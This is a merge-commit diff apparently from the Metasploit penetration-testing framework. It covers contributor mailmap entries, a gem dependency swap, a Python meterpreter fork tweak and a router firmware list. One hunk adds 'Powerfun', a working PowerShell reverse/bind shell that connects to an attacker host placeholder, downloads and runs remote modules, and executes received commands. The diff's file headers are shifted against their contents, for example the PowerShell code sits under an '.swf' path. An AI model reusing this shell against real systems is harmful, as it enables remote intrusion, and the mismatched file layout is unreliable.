Merge branch 'upstream/master' into multi-transport-support

Conflicts:
	lib/msf/core/payload/windows/stageless_meterpreter.rb
	lib/msf/core/payload/windows/x64/stageless_meterpreter.rb
	lib/rex/post/meterpreter/client_core.rb
	modules/payloads/stages/linux/x86/meterpreter.rb
	modules/payloads/stages/windows/meterpreter.rb
	modules/payloads/stages/windows/x64/meterpreter.rb

Author: OJ

.mailmap

@@ -1,41 +1,45 @@
 bcook-r7 <bcook-r7@github>         Brent Cook <[email protected]>
 bturner-r7 <bturner-r7@github>     Brandon Turner <[email protected]>
+ccatalan-r7 <ccatalan-r7@github>   Christian Catalan <[email protected]>
 cdoughty-r7 <cdoughty-r7@github>   Chris Doughty <[email protected]>
 dheiland-r7 <dheiland-r7@github>   Deral Heiland <[email protected]>
-dmaloney-r7 <dmaloney-r7@github>   David Maloney <[email protected]>
 dmaloney-r7 <dmaloney-r7@github>   David Maloney <[email protected]>
+dmaloney-r7 <dmaloney-r7@github>   David Maloney <[email protected]>
 dmaloney-r7 <dmaloney-r7@github>   dmaloney-r7 <[email protected]>
 ecarey-r7 <ecarey-r7@github>       Erran Carey <[email protected]>
 farias-r7 <farias-r7@github>       Fernando Arias <[email protected]>
 hmoore-r7 <hmoore-r7@github>       HD Moore <[email protected]>
 hmoore-r7 <hmoore-r7@github>       HD Moore <[email protected]>
 jhart-r7 <jhart-r7@github>         Jon Hart <[email protected]>
-jlee-r7 <jlee-r7@github>           egypt <[email protected]> # aka egypt
-jlee-r7 <jlee-r7@github>           James Lee <[email protected]> # aka egypt
 jlee-r7 <jlee-r7@github>           James Lee <[email protected]>
+jlee-r7 <jlee-r7@github>           James Lee <[email protected]> # aka egypt
+jlee-r7 <jlee-r7@github>           egypt <[email protected]> # aka egypt
 jvazquez-r7 <jvazquez-r7@github>   jvazquez-r7 <[email protected]>
 jvazquez-r7 <jvazquez-r7@github>   jvazquez-r7 <[email protected]>
 kgray-r7 <kgray-r7@github>         Kyle Gray <[email protected]>
 limhoff-r7 <limhoff-r7@github>     Luke Imhoff <[email protected]>
-lsanchez-r7 <lsanchez-r7@github>   darkbushido <[email protected]>
 lsanchez-r7 <lsanchez-r7@github>   Lance Sanchez <[email protected]>
 lsanchez-r7 <lsanchez-r7@github>   Lance Sanchez <[email protected]>
-lsanchez-r7 <lsanchez-r7@github>   Lance Sanchez <[email protected]>
 lsanchez-r7 <lsanchez-r7@github>   Lance Sanchez <[email protected]>
+lsanchez-r7 <lsanchez-r7@github>   Lance Sanchez <[email protected]>
+lsanchez-r7 <lsanchez-r7@github>   darkbushido <[email protected]>
 mbuck-r7 <mbuck-r7@github>         Matt Buck <[email protected]>
 mbuck-r7 <mbuck-r7@github>         Matt Buck <[email protected]>
 mschloesser-r7 <mschloesser-r7@github> Mark Schloesser <[email protected]>
 mschloesser-r7 <mschloesser-r7@github> mschloesser-r7 <[email protected]>
 parzamendi-r7 <parzamendi-r7@github> parzamendi-r7 <[email protected]>
+pdeardorff-r7 <pdeardorff-r7@github> Paul Deardorff <[email protected]>
+pdeardorff-r7 <pdeardorff-r7@github> pdeardorff-r7 <[email protected]>
+sgonzalez-r7 <sgonzalez-r7@github> Sonny Gonzalez <[email protected]>
 shuckins-r7 <shuckins-r7@github>   Samuel Huckins <[email protected]>
 todb-r7 <todb-r7@github>           Tod Beardsley <[email protected]>
 todb-r7 <todb-r7@github>           Tod Beardsley <[email protected]>
 todb-r7 <todb-r7@github>           Tod Beardsley <[email protected]>
-trosen-r7 <trosen-r7@github>       Trevor Rosen <[email protected]>
 trosen-r7 <trosen-r7@github>       Trevor Rosen <[email protected]>
+trosen-r7 <trosen-r7@github>       Trevor Rosen <[email protected]>
+wchen-r7 <wchen-r7@github>         Wei Chen <[email protected]>
 wchen-r7 <wchen-r7@github>         sinn3r <[email protected]> # aka sinn3r
 wchen-r7 <wchen-r7@github>         sinn3r <[email protected]>
-wchen-r7 <wchen-r7@github>         Wei Chen <[email protected]>
 wvu-r7 <wvu-r7@github>             William Vu <[email protected]>
 wvu-r7 <wvu-r7@github>             William Vu <[email protected]>
 wvu-r7 <wvu-r7@github>             William Vu <[email protected]>

Gemfile.lock

@@ -9,7 +9,7 @@ PATH
       json
       metasploit-concern (= 0.4.0)
       metasploit-model (~> 0.29.0)
-      meterpreter_bins (= 0.0.22)
+      metasploit-payloads (= 0.0.3)
       msgpack
       nokogiri
       packetfu (= 1.1.9)
@@ -123,6 +123,7 @@ GEM
     metasploit-model (0.29.2)
       activesupport
       railties (< 4.0.0)
+    metasploit-payloads (0.0.3)
     metasploit_data_models (0.24.0)
       activerecord (>= 3.2.13, < 4.0.0)
       activesupport
@@ -132,7 +133,6 @@ GEM
       pg
       railties (< 4.0.0)
       recog (~> 1.0)
-    meterpreter_bins (0.0.22)
     method_source (0.8.2)
     mime-types (1.25.1)
     mini_portile (0.6.2)

data/exploits/CVE-2014-8440/msf.swf

@@ -0,0 +1,59 @@
+# Powerfun - Written by Ben Turner & Dave Hardy
+
+function Get-Webclient 
+{
+    $wc = New-Object -TypeName Net.WebClient
+    $wc.UseDefaultCredentials = $true
+    $wc.Proxy.Credentials = $wc.Credentials
+    $wc
+}
+function powerfun 
+{ 
+    Param( 
+        [String]$Command,
+        [String]$Download
+    ) 
+    Process {
+    $modules = @(MODULES_REPLACE)  
+    if ($Command -eq "bind")
+    {
+        $listener = [System.Net.Sockets.TcpListener]LPORT_REPLACE
+        $listener.start()    
+        $client = $listener.AcceptTcpClient()
+    } 
+    if ($Command -eq "reverse")
+    {
+        $client = New-Object System.Net.Sockets.TCPClient("LHOST_REPLACE",LPORT_REPLACE)
+    }
+    $stream = $client.GetStream()
+    [byte[]]$bytes = 0..255|%{0}
+    if ($Download -eq "true")
+    {
+        ForEach ($module in $modules)
+        {
+            (Get-Webclient).DownloadString($module)|Invoke-Expression
+        } 
+    }
+    $sendbytes = ([text.encoding]::ASCII).GetBytes("Windows PowerShell running as user " + $env:username + " on " + $env:computername + "`nCopyright (C) 2015 Microsoft Corporation. All rights reserved.`n`n")
+    $stream.Write($sendbytes,0,$sendbytes.Length)
+    $sendbytes = ([text.encoding]::ASCII).GetBytes('PS ' + (Get-Location).Path + '>')
+    $stream.Write($sendbytes,0,$sendbytes.Length)
+    while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0)
+    {
+        $EncodedText = New-Object -TypeName System.Text.ASCIIEncoding
+        $data = $EncodedText.GetString($bytes,0, $i)
+        $sendback = (Invoke-Expression -Command $data 2>&1 | Out-String )
+
+        $sendback2  = $sendback + 'PS ' + (Get-Location).Path + '> '
+        $x = ($error[0] | Out-String)
+        $error.clear()
+        $sendback2 = $sendback2 + $x
+
+        $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2)
+        $stream.Write($sendbyte,0,$sendbyte.Length)
+        $stream.Flush()  
+    }
+    $client.Close()
+    $listener.Stop()
+    }
+}

data/exploits/powershell/powerfun.ps1

@@ -22,6 +22,7 @@
 # this MUST be imported for urllib to work on OSX
 try:
 	import SystemConfiguration as osxsc
+	osxsc.SCNetworkInterfaceCopyAll()
 	has_osxsc = True
 except ImportError:
 	has_osxsc = False
@@ -749,7 +750,7 @@ def create_response(self, request):
 		resp = struct.pack('>I', len(resp) + 4) + resp
 		return resp
 
-if not hasattr(os, 'fork') or has_osxsc or (hasattr(os, 'fork') and os.fork() == 0):
+if not hasattr(os, 'fork') or (hasattr(os, 'fork') and os.fork() == 0):
 	if hasattr(os, 'setsid'):
 		try:
 			os.setsid()

data/meterpreter/ext_server_networkpug.lso

@@ -1,7 +1,14 @@
-Alphanetworks wrgg19_c_dlwbr_dir300 
+Alphanetworks wrgg19_c_dlwbr_dir300
 Alphanetworks wrgn49_dlob_dir600b
 Alphanetworks wrgn23_dlwbr_dir600b
 Alphanetworks wrgn22_dlwbr_dir615
 Alphanetworks wrgnd08_dlob_dir815
 Alphanetworks wrgg15_di524
-Alphanetworks wrgn39_dlob.hans_dir645
+Alphanetworks wrgn39_dlob.hans_dir645
+Alphanetworks wapnd03cm_dkbs_dap2555
+Alphanetworks wapnd04cm_dkbs_dap3525
+Alphanetworks wapnd15_dlob_dap1522b
+Alphanetworks wrgac01_dlob.hans_dir865
+Alphanetworks wrgn23_dlwbr_dir300b
+Alphanetworks wrgn28_dlob_dir412
+Alphanetworks wrgn39_dlob.hans_dir645_V1